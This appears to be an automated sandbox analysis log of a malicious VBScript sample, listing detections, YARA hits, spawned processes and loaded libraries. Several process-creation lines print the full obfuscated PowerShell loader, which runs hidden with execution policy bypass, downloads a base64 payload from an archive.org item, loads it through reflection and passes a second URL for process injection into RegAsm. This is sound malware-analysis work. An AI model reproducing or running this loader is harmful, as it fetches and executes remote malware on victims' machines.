              Source: powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61F949000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000003.00000002.1754168405.000001A61E3C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61FEB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.arXz
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61F949000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61F949000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtCNA;gYFbase64Content
              Source: powershell.exe, 00000003.00000002.1770505012.000001A62E855000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.4:49730 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: Process Memory Space: powershell.exe PID: 7600, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7768, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B8106443_2_00007FFD9B810644
              Source: kz1fEn2R9Z.vbsInitial sample: Strings found which are bigger than 50
              Source: Process Memory Space: powershell.exe PID: 7600, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7768, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@6/5@1/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aw3zflkn.xpi.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs"
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: kz1fEn2R9Z.vbsReversingLabs: Detection: 26%
              Source: kz1fEn2R9Z.vbsVirustotal: Detection: 12%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
